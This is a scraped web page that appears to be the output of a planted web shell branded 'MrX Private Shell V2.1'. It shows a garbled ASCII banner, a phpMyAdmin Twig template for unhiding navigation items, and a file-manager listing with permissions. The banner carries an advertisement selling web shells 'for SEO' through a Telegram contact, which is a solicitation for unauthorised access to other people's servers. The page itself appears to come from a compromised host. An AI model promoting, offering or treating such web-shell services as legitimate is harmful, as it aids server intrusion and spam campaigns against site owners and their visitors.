__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<form class="ajax" action="{{ url('/navigation') }}" method="post">
<fieldset class="pma-fieldset">
{{ get_hidden_inputs(database, table) }}
{% for type, label in types %}
{% if (item_type is empty or item_type == type) and hidden[type] is iterable %}
{{ not loop.first ? '<br>' }}
<strong>{{ label }}</strong>
<table class="table w-100">
<tbody>
{% for item in hidden[type] %}
<tr>
<td>{{ item }}</td>
<td class="text-end">
<a class="unhideNavItem ajax" href="{{ url('/navigation') }}" data-post="{{ get_common({
'unhideNavItem': true,
'itemType': type,
'itemName': item,
'dbName': database
}, '', false) }}">{{ get_icon('show', 'Unhide'|trans) }}</a>
</td>
</tr>
{% endfor %}
</tbody>
</table>
{% endif %}
{% endfor %}
</fieldset>
</form>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| tree | Folder | 0755 |
|
|
| item_unhide_dialog.twig | File | 1.01 KB | 0644 |
|
| main.twig | File | 3.66 KB | 0644 |
|